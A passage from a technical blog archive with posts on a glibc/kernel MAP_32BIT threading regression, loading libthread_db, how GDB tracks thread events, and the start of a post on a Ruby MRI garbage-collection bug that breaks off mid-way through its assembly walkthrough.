time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur

Archive for the ‘linux’ Category

Digging out the craziest bug you never heard about from 2008: a linux threading regression

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This blog post will show how a fix for XFree86 and linuxthreads ended up causing a major threading regression about 7 years after the fix was created.

The regression was in pthread_create. Thread creation performed very slowly as the number of threads in a process increased. This bug is present on CentOS 5.3 (and earlier) and other linux distros as well.

It is also very possible that this bug impacted research done before August 15, 2008 (in the best case because Linux distro releases are slow) on building high performance threaded applications.

Digging this thing out was definitely one of the more interesting bug hunts in recent memory.

Hopefully, my long (and insane) story will encourage you to thoroughly investigate suspicious sources of performance degradation before applying the “[thing] is slow” label.

[thing] might be slow, but it may be useful to understand why.

Versions

This blog post will be talking about:

  • glibc 2.7. Earlier versions are probably affected, but you will need to go look and see for sure.
  • Linux kernels earlier than 2.6.27. Some linux distributions will backport fixes, so it is possible you could be running an earlier kernel version, but without the bug described below. You will need to go look and see for sure.

Linux’s mmap and MAP_32BIT

mmap is a system call that a program can use to map regions of memory into its address space. mmap can be used to map files into RAM and to share these mappings with other processes. mmap is also used by memory allocators to obtain large regions of memory that can be carved up and handed out to a program.

On June 29, 2001, Andi Kleen added a flag to Linux’s mmap called MAP_32BIT. This commit message reads in part1:

This adds a new mmap flag to force mappings into the low 32bit address space.
Useful e.g. for XFree86′s ELF loader or linuxthreads’ thread local
data structures.

As Kleen mentions, XFree86 has its own ELF loader that appears to have been released as part of the 4.0.1 release back in 2000. The purpose of this ELF loader is to allow loadable module support for XFree86 even on systems that don’t necessarily have support for loadable modules. Another interesting side effect of the decision to include an ELF loader is that loadable modules can be built once and then reused on any system that XFree86 supports without recompiling the module source.

It appears that Kleen added MAP_32BIT to allow programs (like XFree86) which assumed mmap would always return 32-bit addresses to continue to work properly as 64-bit processors were beginning to enter the market.

Then, on November 11, 2002, Egbert Eich added some code to XFree86 to actually use the MAP_32BIT flag, the commit message says:

532. Fixed module loader to map memory in the low 32bit address space on
x86-64 (Egbert Eich).

Thus, 64-bit XFree86 builds would now have a working ELF loader since those builds would be able to get memory with 32-bit addresses.

I will touch on the threading implications mentioned in Kleen’s commit message a bit later.

ELF small code execution model and a tweak to MAP_32BIT

The AMD64 ABI lists several different code models which differ in addressing, code size, data size, and address range.

Specifically, the spec defines something called the small code model.

The small code model is defined such that that all symbols are known to be located in the range from 0 to 0x7EFFFFFF (among other things that are way beyond the scope of this blogpost).

In order to support this code execution model, Kleen added a small tweak to MAP_32BIT to limit the range of addresses that mmap would return in order to support the small code execution model.

Unfortunately, I have not been able to track down the exact commit with Kleen’s commit message (if there was one), but it occurred sometime between November 28, 2002 (kernel 2.4.20) and June 13, 2003 (kernel 2.4.21).

I did find what looks like a merge commit or something. It shows the code Kleen added and a useful comment explaining why the address range was being limited:

+	} else if (flags & MAP_32BIT) { 
+		/* This is usually used needed to map code in small
+		   model: it needs to be in the first 31bit. Limit it
+		   to that.  This means we need to move the unmapped
+		   base down for this case.  This may give conflicts
+		   with the heap, but we assume that malloc falls back
+		   to mmap. Give it 1GB of playground for now. -AK */ 
+		if (!addr) 
+			addr = 0x40000000; 
+		end = 0x80000000;		

Unfortunately, now the flag’s name MAP_32BIT is inaccurate.

The range has been limited to a single gigabyte from 0x40000000 (1gb) – 0x80000000 (2gb). This is good enough for the ELF small code model mentioned above, but this means any memory successfully mapped with MAP_32BIT is actually mapped within the first 31 bits and thus this flag should probably be called MAP_31BIT or something else that more accurately describes its behavior.

Oops.

pthread_create and thread stacks

When you create a thread using pthread_create there are two ways to allocate a region of memory for that thread to use as its stack:

  • Allow libpthread to allocate the stack itself. You do this by simply calling pthread_create. This is the common case for most programs. Use pthread_attr_getstacksize and pthread_attr_setstacksize to get and set the stack size.

or

  • A three step process:

    1. Allocate a region of memory possibly with mmap, malloc (which may just call mmap for large allocations), or statically.
    2. Use pthread_attr_setstack to set the address and size of the stack in a pthread attribute object.
    3. Pass said attribute object along to pthread_create and the thread which is created will have your memory region set as its stack.

Slow context switches, glibc, thread local storage, … wow …

A lot of really crazy shit happened in 2003, so I will try my best to split into digestible chunks.

Slow context switching on AMD k8

On February 12, 2003, it was reported that early AMD P4 CPUs were very slow when executing the wrmsr instruction. This instruction is used to write to model specific registers (MSRs). This instruction was used a few times in context switch code and removing it would help speed up context switch time. This code was refactored, but the data gathered here would be used as a justification for using MAP_32BIT in glibc a few months later.

MAP_32BIT being introduced to glibc

On March 4, 2003, it appears that Ulrich Drepper added code to glibc to use the MAP_32BIT flag in glibc. As far as I can tell, this was the first time MAP_32BIT was introduced to glibc2 .

An interesting comment is presented with a small piece of the patch:

+/* For Linux/x86-64 we have one extra requirement: the stack must be
+   in the first 4GB.  Otherwise the segment register base address is
+   not wide enough.  */
+#define EXTRA_PARAM_CHECKS \
+  if ((uintptr_t) stackaddr > 0x100000000ul                                  \
+      || (uintptr_t) stackaddr + stacksize > 0x100000000ul)                  \
+    /* We cannot handle that stack address.  */                                      \
+    return EINVAL

To understand this comment it is important to understand how Linux deals with thread local storage.

Briefly,

  • Each thread has a thread control block (TCB) that contains various internal information that nptl needs, including some data that can be used to access thread local storage.
  • The TCB is written to the start of the thread stack by nptl.
  • The address of the TCB (and thus the thread stack) needs to be stored in such a way that nptl, code generated by gcc, and the kernel can access the thread control block of the currently running thread. In other words, it needs to be context switch friendly.
  • The register set of Intel processors is saved and restored each time a context switch occurs.
  • Saving the address of the TCB in a register would be ideal.

x86 and x86_64 processors are notorious for not having many registers available, however Linux does not use the FS and GS segment selectors for segmentation. So, the address of the TCB can be stored in FS or GS if it will fit.

Unfortunately, the segment selectors FS and GS can only store 32-bit addresses and this is why Ulrich added the above code. Addresses above 4gb could not be stored in FS or GS.

It appears that this comment is correct for all of the Linux 2.4 series kernels and all Linux 2.5 kernels less than 2.5.65. On these kernel versions, only the segment selector is used for storing the thread stack address and as a result no thread stack above 4gb can be stored.

32-bit and 64-bit thread stacks

Starting with Linux 2.5.65 (and more practically, Linux 2.6.0), support for both 32-bit and 64-bit thread stacks had made its way into the kernel. 32-bit thread stacks would be stored in a segment selector while 64-bit thread stack addresses would be stored in a model specific register (MSR).

Unfortunately, as was reported back in February 12, 2003, writing to MSRs is painfully slow on early AMD K8 processors. To avoid writing to an MSR, you would need to supply a 32-bit thread stack address, and thus Ulrich added the following code to glibc on May 9, 2003:

+/* We prefer to have the stack allocated in the low 4GB since this
+   allows faster context switches.  */
+#define ARCH_MAP_FLAGS MAP_32BIT
+
+/* If it is not possible to allocate memory there retry without that
+   flag.  */
+#define ARCH_RETRY_MMAP(size) \
+  mmap (NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC,                              \
+       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)
+
+

This code is interesting for two reasons:

  1. The justification for using MAP_32BIT has changed from the kernel not supporting addresses above 4gb to decreasing context switch cost.
  2. A retry mechanism is added so that if no memory is available when using MAP_32BIT, a thread stack will be allocated somewhere else.

At some unknown (by me) point in 2003, MAP_32BIT had been sterilized as explained earlier to deal with the ELF small code model in the AMD64 ABI.

The end result being that user programs have only 1gb of space with which to allocate all their thread stacks (or other low memory requested with MAP_32BIT).

This seems bad.

Fast forward to 2008: an bug

On August 13, 2008 an individual named “Pardo” from Google posted a message to the Linux kernel mailing list about a regression in pthread_create:

mmap() is slow on MAP_32BIT allocation failure, sometimes causing
NPTL’s pthread_create() to run about three orders of magnitude slower.
As example, in one case creating new threads goes from about 35,000
cycles up to about 25,000,000 cycles — which is under 100 threads per
second.

Pardo had filled the 1gb region that MAP_32BIT tries to use for thread stacks causing glibc to fallback to the retry mechanism that Drepper added back in 2003.

Unfortunately, the failing mmap call with MAP_32BIT was doing a linear fucking search of all the “low address space” memory regions trying to find a fit before falling back and calling mmap a second time without MAP_32BIT.

And so after a few thousand threads, every new pthread_create call would trigger two system calls, the first of which would do a linear search of low memory before failing. The linear search and retry dramatically increased the time to create new threads.

This is pretty bad.

bugfixes for the kernel and glibc

So, how does glibc and the kernel fix this problem?

Ingo Molnar convinced everyone that the best solution was to add a new flag to the Linux kernel called MAP_STACK. This flag would be defined as “give out an address that is best suited for process/thread stacks”. This flag would actually be ignored by the kernel. This change appeared in Linux kernel 2.6.27 and was added on August 13, 2008.

Ulrich Drepper updated glibc to use MAP_STACK instead of MAP_32BIT and he removed the retry mechanism he added in 2003 since MAP_STACK should always succeed if there is any memory available. This change was added on August 15, 2008.

MAP_32BIT cannot be removed from the kernel, unfortunately because there are many programs out in the wild (older versions of glibc, Xfree86, older versions of ocamlc) that rely on this flag existing to actually work.

And so, MAP_32BIT will remain. A misnamed, strange looking wart that will probably be around forever to remind us that computers are hard.

Bad research (or not)?

I recall reading a paper that benchmarked thread creation time from back in the 2005-2008 time period which claimed that as the number of threads increased the time to create new threads also increased and thus, threads were bad.

I can’t seem to find that paper and it is currently 3:51 AM PST, so, who knows I could be misremembering things. If some one knows what paper I am talking about, please let me know.

If such a paper exists (and I think it does), this blog post explains why thread creation benchmarks would have resulted in really bad looking graphs.

Conclusion

I really don’t even know what to say, but:

  • Computers are hard
  • Ripping the face off of bugs like this is actually pretty fun
  • Be careful when adding linear time searches to potential hot paths
  • Make sure to carefully read and consider the effects of low level code
  • Git is your friend and you should use it to find data about things from years long gone
  • Any complicated application, kernel, or whatever will have a large number of ugly scars and warts that cannot be changed to maintain backward compatibility. Such is life.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://web.archiveorange.com/archive/v/iv9U0zrDmBRAagTHyhHz []
  2. The sha for this change is: 0de28d5c71a3b58857642b3d5d804a790d9f6981 for those who are curious to read more. []

Written by Joe Damato

May 6th, 2013 at 4:13 am

Posted in bugfix,linux

Notes about an odd, esoteric, yet incredibly useful library: libthread_db

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This blog post will examine one of the weirder libraries I’ve come across: libthread_db.

libthread_db is typically used by debuggers, tracers, and other low level debugging/profiling applications to gather information about the threads in a running target process. Unfortunately, the documentation about how to use this library is a bit lacking and using it is not straightforward at all.

This library is pretty strange and there are several gotchas when trying to write a debugger or tracing program that makes use of the various features libthread_db provides.

Loading the library (and probably failing)

As strange as it may seem to those who haven’t used this library before, loading and linking to libthread_db is not as straight forward as simply adding -lthread_db to your linker flags.

The key thing to understand is that different target programs may use different threading libraries. Individual threading libraries may or may not have a corresponding libthread_db that works with a particular threading library, or even with a particular version of a particular threading library.

So until you attach to a target process, you have no idea which of the possibly several libthread_db libraries on the system you will need to use to gather threading information from a target process.

You don’t even know where the corresponding libthread_db library may live.

So, to load libthread_db in your debugger/tracer, you must:

  1. Attach to your target process, usually via ptrace.
  2. Traverse the target process’ link map to determine which libraries are currently loaded. Your program should search for the threading library of the process (often libpthread, but maybe your target program uses something else instead).
  3. Once found, your program can search in nearby directories for the location of libthread_db. In the most common case, a program will use libpthread as its threading library and the corresponding libthread_db will be located in the same directory. Of course, you could also allow the user to specify the exact location.
  4. Once found, simply use libdl to dlopen the libary.
  5. If your target process is a linux process which uses libpthread (a common casse), libthread_db fails to load with libdl. Other libthread_db libraries may or may not load fine.

libthread_db’s numerous undefined symbols

If you’ve followed the above steps to attempt to locate libthread_db and are targeting a linux process that uses libpthread, you have now most likely failed to load it due to a number of undefined symbols.

Let’s use ldd to figure out what is going on:

joe@ubuntu:~$ ldd -r /lib/x86_64-linux-gnu/libthread_db.so.1 | grep undefined
undefined symbol: ps_pdwrite	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_pglobal_lookup	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_lsetregs	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_getpid	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_lgetfpregs	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_lsetfpregs	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_lgetregs	(/lib/x86_64-linux-gnu/libthread_db.so.1)
undefined symbol: ps_pdread	(/lib/x86_64-linux-gnu/libthread_db.so.1)

Bring your own symbols to this party

libthread_db will fail to load due to undefined symbols because the library expects your program to provide the implementations of these symbols. Unfortunately, the only way to determine which functions must be implemented is to examine the source code of the libthread_db implementation(s) you are targeting.

The libthread_db implementations that come with glibc include a header file named proc_service.h which list all the functions and prototypes that your program must provide. I’ve noticed that other libthread_db implementations also provide a similar header file.

These functions are all very platform specific and to maximize the portability of the various implementations of libthread_db the implementations are left to the program using libthread_db.

In general, your program must provide implementations of:

  • Functions to read from and write to the address space of a targeted process. Typically implemented with ptrace.
  • Functions to read and write the general purpose registers and floating point registers (if there are any). Typically implemented with ptrace.
  • A function to locate a specified shared object and search that object for a particular symbol. This function is significantly more complex than the other functions. Your program could use something like libbfd or libelf to make locating a library and searching it’s symbol tables easier. If you are implementing a debugger or tracer, you likely already have the pieces you need to implement this function.
  • A structure struct ps_prochandle that libthread_db will pass through to the functions you implemented that are described above. You will place whatever data your functions will need. Typically this is something like a pid that you can pass through to ptrace.

libthread_db still fails to load

So, you’ve implemented the symbols you were required to implement, but you are still unable to load libthread_db with libdl because you are getting undefined symbol: ... errors.

Even stranger, you are getting these errors even though you are providing the symbols listed in the error messages!

The problem that you are running into is that the symbols are not being placed into the correct ELF symbol table. When you build an executable with gcc, the exported symbols of the executable are placed in the ELF section named .symtab. When libthread_db gets loaded with libdl, only the symbols in the .dynsym symbol table are examined to resolve dependencies. Thus, your symbols will not be found and libthread_db will fail to load.

Why this happens is beyond the scope of this blog post, but I’ve written about dynamic linking and symbol tables before here and here, if you are curious to learn a bit more.

Use this one weird trick for getting your symbols in the dynamic symbol table

There are actually two ways to make sure your symbols end up in the dynamic symbol table.

The first way to do it is to use the large hammer approach and pass the flag --export-dynamic to ld. This will add all exported symbols to the dynamic symbol table and you will be able to load libthread_db.

The second way to do it is much cleaner and strongly recommend over the previous method.

  • Create a file which specifies the symbol names you want added to the dynamic symbol table.
  • Use the linker flag --dynamic-list=FILENAME to let ld know which symbols you want placed in the dynamic symbol table.

Your file might look something like this:

{
   ps_pdread;
   ps_pdwrite;
   ps_pglobal_lookup;
   /* more symbol names would go here... */
};

If you are using gcc, you can then simply pass the flag: -Wl,--dynamic-list=FILENAME and your executable will have the symbols listed in the file placed in the dynamic symbol table.

Regardless of which method you use be sure to verify the results by using readelf to determine if the symbols actually made it to the correct symbol table.

Calling the initialize function and allocating a libthread_db handle

So, after all that work you will finally be able to load the library.

Since the library was loaded with libdl, you will need to use dlsym to grab function pointers to all the functions you intend to use. This is kind of tedious, but you can make clever use of C macros to help you, as long as you also make use of documentation to explain how they work.

So, to find and call the initialize function (without any macros for sanity and clarity):

   /* find the init function */
   td_init = dlsym(handle, "td_init");
   if (td_init == NULL) {
     fprintf(stderr, "Unable to find td_init");
     return -1;
   }

  /* call the init function */
  err = td_init();
  if (err != TD_OK) {
     fprintf(stderr, "td_init: %d\n",err);
     return -1;
  }

  /* find the libthread_db handle allocator function */
  td_ta_new = dlsym(handle, "td_ta_new");                                       
  if (td_ta_new == NULL) {                                                      
     fprintf(stderr, "Unable to find td_ta_new");                                           
     return -1;                                                                      
  }
 
  /* call td_ta_new */
  err = td_ta_new(&somestructure->ph, &somestructure->ta);
  if (err != TD_OK) {                                                               
     fprintf(stderr, "td_ta_new failed: %d\n", err);                           
     return -1;
  }

  /* XXX don't forget about td_ta_delete */

A cool version check

td_ta_new performs a rather interesting version check when called before allocating a handle:

  1. First, it uses the ps_pglobal_lookup symbol you implemented to search for the symbol nptl_version in the libpthread library linked into the remote process. Your function should find this symbol and return the address.
  2. Next, td_ta_new reads several bytes from the target process at the address your ps_pglobal_lookup returned using your ps_pdread function.
  3. Lastly, the bytes read from the target process are checked against libthread_db‘s internal version to determine if the versions match.

So, the library you load calls functions you implemented to search the symbol tables of a process you are attached to in order to read a series of bytes out of that process’ address space to determine if that process’ threading library matches the version of libthread_db you loaded into your debugger.

Fucking rad.

By the way, if you were wondering why libpthread is one of the few libraries that is not stripped on Linux, now you know. If it were stripped, this check would fail, unless of course your ps_pglobal_lookup function searched debug information.

Now you can use the library

At this point, you’ve done enough setup to be able to dlsym search for and call various functions to iterate over the threads in a remote process, to be notified asynchronously when threads are created or destroyed, and to access thread local data if you want to.

Conclusion

Here’s a summary of the steps you need to go through to load, link, and use libthread_db:

  • Implement a series of functions and structures specified in the libthread_db implementation(s) you are targeting. You can find these in the header file called proc_service.h.
  • Attach to the remote process, determine the path of the threading library it is using and look nearby to find libthread_db. Alternatively, allow the user to specify the location of libthread_db.
  • Use libdl to load the library by calling dlopen.
  • Use dlsym to find td_init and td_ta_new. Call these functions to initialize the library.
  • Ensure you are using either --export-dynamic or --dynamic-list=FILENAME to place the symbols in the correct symbol table so that the runtime dynamic linker will find them when you load libthread_db.
  • Make sure to use lots of error checking and debug output to ensure that your implemented functions are being hit and that they are returning the proper return values as specified in proc_service.h.
  • Sit back and consider that this entire process actually works and allows you to debug or trace processes with multiple threads.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

Written by Joe Damato

April 22nd, 2013 at 2:24 am

How do debuggers keep track of the threads in your program?

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This post describes the relatively undocumented API for debuggers (or other low level programs) that can be used to enumerate the existing threads in a process and receive asynchronous notifications when threads are created or destroyed. This API also provides asynchronous notifications of other interesting thread-related events and feels very similar to the interface exposed by libdl for notifying debuggers when libraries are loaded dynamically at run time.

amd64 and gnu syntax

As usual, everything below refers to amd64 unless otherwise noted. Also, all assembly is in AT&T syntax.

software breakpoints

It’s important to begin first by examining how software breakpoints work. We’ll see shortly why this is important, but for now just trust me.

A debugger sets a software breakpoint by using the ptrace system call to write a special instruction into a target process’ address space. That instruction raises software interrupt #3 which is defined as the Breakpoint Exception in the Intel 64 Architecture Developers Manual.1 When this interrupt is raised, the processor undergoes a privilege level change and calls a function specified by the kernel to handle the exception.

The exception handler in the kernel executes to deliver the SIGTRAP signal to the process. However, if a debugger is attached to a process with ptrace, all signals are first delivered to the debugger. In the case of SIGTRAP, the debugger can examine the list of breakpoints set by the user and take the appropriate action (draw a UI, update the console, or whatever).

The debugger finishes up by masking this signal from the process it is attached to, preventing that process from being killed (most processes will not have a signal handler for SIGTRAP).

In practice most binaries generated by compilers will not have this instruction; it is up to the debugger to write this instruction into the process’ address space during runtime. If you are so inclined, you can raise interrupt #3 via inline assembly or by calling an assembly stub yourself. Many debuggers will catch this signal and trigger an update of some form in the UI.

All that said, this is what the instruction looks like when disassembled:

int 0x03

You may find it useful to check out an earlier and more in-depth article I wrote a while ago about signal handling.

Enumerating threads when first attaching

When a debugger first attaches to a program the program has an unknown number of threads that must be enumerated. glibc exposes a straightforward API for this called td_ta_thr_iter2 found in glibc at nptl_db/td_ta_thr_iter.c. This function takes a callback as one of its arguments. The callback is called once per thread and is passed a handle to an object describing each thread in the process.

We can see the code in GDB3 which uses this API to hand over a callback which will be hit to enumerate the existing threads in a process:

static int
find_new_threads_once (struct thread_db_info *info, int iteration,
      				   td_err_e *errp)
{
  volatile struct gdb_exception except;
  struct callback_data data;
  td_err_e err = TD_ERR;

  data.info = info;
  data.new_threads = 0;

  TRY_CATCH (except, RETURN_MASK_ERROR)
    {
      /* Iterate over all user-space threads to discover new threads.  */
      err = info->td_ta_thr_iter_p (info->thread_agent,
	   			find_new_threads_callback,
	   			&data,
	   			TD_THR_ANY_STATE,
	   			TD_THR_LOWEST_PRIORITY,
	   			TD_SIGNO_MASK,
	   			TD_THR_ANY_USER_FLAGS);
    }
  /* ... */

That’s pretty straightforward, but there are some hairy race conditions, as we can see in this code snippet from thread_db_find_new_threads_2 which calls find_new_threads_once:

if (until_no_new)
  {
    /* Require 4 successive iterations which do not find any new threads.
 	The 4 is a heuristic: there is an inherent race here, and I have
 	seen that 2 iterations in a row are not always sufficient to
 	"capture" all threads.  */
    for (i = 0, loop = 0; loop < 4; ++i, ++loop)
 	if (find_new_threads_once (info, i, NULL) != 0)
 	  /* Found some new threads.  Restart the loop from beginning.»·*/
 	  loop = -1;
  }

It's fiiiiiiiiiinnnneeee.

Now, on to the more interesting interface that is, IMHO, much less straightforward.

Notification of thread create and destroy

A debugger can also gather thread create and destroy events through an interesting asynchronous interface. Let's go step by step and see how a debugger can listen for create and destroy events.

Enable event notification

First, process wide event notification has to be enabled. This API looks very much like some pieces of the signal API. First we have to create a set of events of we care about (from GDB4 ):

static void
enable_thread_event_reporting (void)
{
  td_thr_events_t events;
  td_err_e err;

  /* ... */

  /* Set the process wide mask saying which events we're interested in.  */
  td_event_emptyset (&events);
  td_event_addset (&events, TD_CREATE);

  /* ... */

  td_event_addset (&events, TD_DEATH);
  
  /* NB: the following is just a pointer to the function td_ta_set_event on linux */
  err = info->td_ta_set_event_p (info->thread_agent, &events);

The above code adds TD_CREATE and TD_DEATH to the (empty) set of events that GDB wants to get notifications about. Then the event mask is handed over to glibc with a call to the function td_ta_set_event, which just happens to be stored in a function pointer named td_ta_set_event_p in GDB.

Set asynchronous notification breakpoints

The next step is interesting.

The debugger must use an API to get the addresses of a functions that will be called whenever a thread is created or destroyed. The debugger will then set a software breakpoint at those addresses. When the program creates a thread or a thread is killed the breakpoint will be triggered and the debugger can walk the thread list and update its internal state that describes the threads in the process.

This API is td_ta_event_addr. Let's check out how GDB uses this API. This code is from the same function as above, but happens after the code shown above:

static void
enable_thread_event_reporting (void)
{

	/* ... code above here ... */

	/* Delete previous thread event breakpoints, if any.  */
	remove_thread_event_breakpoints ();
	info->td_create_bp_addr = 0;
	info->td_death_bp_addr = 0;
	
	/* Set up the thread creation event.  */
	err = enable_thread_event (TD_CREATE, &info->td_create_bp_addr);
	
	/* ... */

	/* Set up the thread death event.  */
	err = enable_thread_event (TD_DEATH, &info->td_death_bp_addr);

GDB's helper function enable_thread_event is pretty straightforward:

static td_err_e
enable_thread_event (int event, CORE_ADDR *bp)
{
  td_notify_t notify;
  td_err_e err;
  struct thread_db_info *info;

  info = get_thread_db_info (GET_PID (inferior_ptid));

  /* Access an lwp we know is stopped.  */
  info->proc_handle.ptid = inferior_ptid;

  /* Get the breakpoint address for thread EVENT.  */
  err = info->td_ta_event_addr_p (info->thread_agent, event, &notify);
  /* ... */

  /* Set up the breakpoint.  */
  gdb_assert (exec_bfd);
  (*bp) = (gdbarch_convert_from_func_ptr_addr
		  (target_gdbarch,
		   /* Do proper sign extension for the target.  */
		   (bfd_get_sign_extend_vma (exec_bfd) > 0
		    ? (CORE_ADDR) (intptr_t) notify.u.bptaddr
		    : (CORE_ADDR) (uintptr_t) notify.u.bptaddr),
		   &current_target));

  create_thread_event_breakpoint (target_gdbarch, *bp);

  return TD_OK;
}

So, GDB stores the addresses of the functions that get called on TD_CREATE and TD_DEATH in td_create_bp_addr and td_death_bp_addr, respectively and sets breakpoints on these addresses in enable_thread_event.

Check if the event has been triggered and drain the event queue

Next time a thread is stopped because a breakpoint has been hit, the debugger needs to check if the breakpoint occurred on an address that is associated with the registered events. If so, the thread event queue needs to be drained with a call to td_ta_event_getmsg and the thread's information can be retrieved with a call to td_thr_get_info .

GDB does all this in a function called check_event:

/* Check if PID is currently stopped at the location of a thread event
   breakpoint location.  If it is, read the event message and act upon
   the event.  */

static void
check_event (ptid_t ptid)
{
  /* ... */
  td_event_msg_t msg;
  td_thrinfo_t ti;
  td_err_e err;
  CORE_ADDR stop_pc;
  int loop = 0;
  struct thread_db_info *info;

  info = get_thread_db_info (GET_PID (ptid));

  /* Bail out early if we're not at a thread event breakpoint.  */
  stop_pc =  /* ... */
  if (stop_pc != info->td_create_bp_addr
      && stop_pc != info->td_death_bp_addr)
    return;

  /* Access an lwp we know is stopped.  */
  info->proc_handle.ptid = ptid;

  /* ... */

  /* If we are at a create breakpoint, we do not know what new lwp
     was created and cannot specifically locate the event message for it.
     We have to call td_ta_event_getmsg() to get
     the latest message.  Since we have no way of correlating whether
     the event message we get back corresponds to our breakpoint, we must
     loop and read all event messages, processing them appropriately.
     This guarantees we will process the correct message before continuing
     from the breakpoint.

     Currently, death events are not enabled.  If they are enabled,
     the death event can use the td_thr_event_getmsg() interface to
     get the message specifically for that lwp and avoid looping
     below.  */

  loop = 1;

  do
    {
      err = info->td_ta_event_getmsg_p (info->thread_agent, &msg);
	  /* ... */
	
      err = info->td_thr_get_info_p (msg.th_p, &ti);
	  /* ... */

      ptid = ptid_build (GET_PID (ptid), ti.ti_lid, 0);

      switch (msg.event)
		{
		case TD_CREATE:
		  /* Call attach_thread whether or not we already know about a
		     thread with this thread ID.  */
		  attach_thread (ptid, msg.th_p, &ti);
		
		  break;
		
		case TD_DEATH:
		
		  if (!in_thread_list (ptid))
		    error (_("Spurious thread death event."));
		
		  detach_thread (ptid);
		
		  break;
		
		default:
		  error (_("Spurious thread event."));
		}
    }
  while (loop);
}

And that is how GDB finds out about existing threads and gets notified about new threads being created or existing threads dying. This asynchronous breakpoint interface is very similar to the interface exposed by libdl that I described briefly toward the end of a blog post I wrote a while ago.

Notifications for other interesting events

Other interesting events are supported by the API but are currently not implemented in glibc, but a motivated programmer could build a shim which implements these events. Doing so would allow you to build some very interesting visualization applications for lock contention and scheduling:

/* Events reportable by the thread implementation.  */
typedef enum
{
  TD_ALL_EVENTS,			/* Pseudo-event number.  */
  TD_EVENT_NONE = TD_ALL_EVENTS, 	/* Depends on context.  */
  TD_READY,				/* Is executable now. */
  TD_SLEEP,				/* Blocked in a synchronization obj.  */
  TD_SWITCHTO,				/* Now assigned to a process.  */
  TD_SWITCHFROM,			/* Not anymore assigned to a process.  */
  TD_LOCK_TRY,				/* Trying to get an unavailable lock.  */
  TD_CATCHSIG,				/* Signal posted to the thread.  */
  TD_IDLE,				/* Process getting idle.  */
  TD_CREATE,				/* New thread created.  */
  TD_DEATH,				/* Thread terminated.  */
  TD_PREEMPT,				/* Preempted.  */
  TD_PRI_INHERIT,			/* Inherited elevated priority.  */
  TD_REAP,				/* Reaped.  */
  TD_CONCURRENCY,			/* Number of processes changing.  */
  TD_TIMEOUT,				/* Conditional variable wait timed out.  */
  TD_MIN_EVENT_NUM = TD_READY,
  TD_MAX_EVENT_NUM = TD_TIMEOUT,
  TD_EVENTS_ENABLE = 31		/* Event reporting enabled.  */
} td_event_e;

Take my shovel and flashlight and go look around

Check the reference section below which has links to some of the source file mentioned above. Also, be sure to check out the header file:

/usr/include/thread_db.h

That header lists the exported functions from glibc as well as the various flags and types necessary for interacting with this interface.

Conclusion

  • Debuggers have really interesting ways of interacting with lower level system libraries.
  • Comments found tucked away in these pits of despair are pretty amazing.
  • Don't be scared. Grab a shovel and see what other interesting things you can dig up in glibc or elsewhere.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. Intel 64 Architecture Developers Manual Volume 3A 6-31 []
  2. glibc/nptl_db/td_ta_thr_iter.c []
  3. gdb/linux-thread-db.c []
  4. gdb/linux-thread-db.c []

Written by Joe Damato

July 2nd, 2012 at 7:30 am

The Broken Promises of MRI/REE/YARV

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This post is going to explain a serious design flaw of the object system used in MRI/REE/YARV. This flaw causes seemingly random segfaults and other hard to track corruption. One popular incarnation of this bug is the “rake aborted! not in gzip format.”

theme song

This blog post was inspired by one of my favorite Papoose verses. If you don’t listen to this while reading, you probably won’t understand what I’m talking about: get in the zone.

rake aborted! not in gzip format
[BUG] Segmentation fault

If you’ve seen either of these error messages you are hitting a fundamental flaw of the object model in MRI/YARV. An example of a fix for a single instance of this bug can be seen in this patch. Let’s examine this specific patch so that we can gain some understanding of the general case.

FACT: What you are about to read is absolutely not a compiler bug.

A small, but important piece of background information

The amd64 ABI1 states that some registers are caller saved, while others are callee saved. In particular, the register rax is caller saved. The callee will overwrite the value in this register to store its return value for the caller so if the caller cares about what is stored in this register, it must be copied prior to a function call.

stare into the abyss part 1

Let’s look at the C code for gzfile_read_raw_ensure WITHOUT the fix from above:

#define zstream_append_input2(z,v)\
    zstream_append_input((z), (Bytef*)RSTRING_PTR(v), RSTRING_LEN(v))

static int
gzfile_read_raw_ensure(struct gzfile *gz, int size)
{
    VALUE str;

    while (NIL_P(gz->z.input) || RSTRING_LEN(gz->z.input) < size) {
	str = gzfile_read_raw(gz);
	if (NIL_P(str)) return Qfalse;
	zstream_append_input2(&gz->z, str);
    }
    return Qtrue;
}

It looks relatively sane at first glance, but to understand this bug we’ll need to examine the assembly generated for this thing. I’m going to rearrange the assembly a bit to make it easier to follow and add few comments a long the way.

First, the code begins by setting the stage:

  push   %rbp
  movslq %esi,%rbp    # sign extend "size" into rbp
  push   %rbx
  mov    %rdi,%rbx    # rbx = gz
  sub    $0x8,%rsp    # make room on the stack for "str"

The above is pretty basic. It is your typical amd64 prologue. After things are all setup, it is time to enter into the while loop in the C code above:

  jmp    1180  # JUMP IN to the loop

Next comes the NIL_P(gz->z.input) portion of the while-loop condition:

  mov    0x18(%rbx),%rax    # rax = gz->z.input
  cmp    $0x4,%rax          # in Ruby, nil is represented as 4.
  je     1190 [gzfile_read_raw_ensure+0x30]  # if gz->z.input is nil, enter the loop

Now the RSTRING_LEN(gz->z.input) < size portion:

  cmp    %rbp,0x10(%rax)        # compare size and gz->z.input->len
  jge    11b0 [gzfile_read_raw_ensure+0x50]  # jump out of loop
                                             # if  gz->z.input->len is >= size

Next comes the call to gzfile_read_raw and the NIL_P(str) check. If this check fails, the code just falls through and exits the loop:

 mov    %rbx,%rdi            # rdi = gz, rdi holds the first argument to a function.
 callq  1090 [gzfile_read_raw]  # call gzfile_read_raw
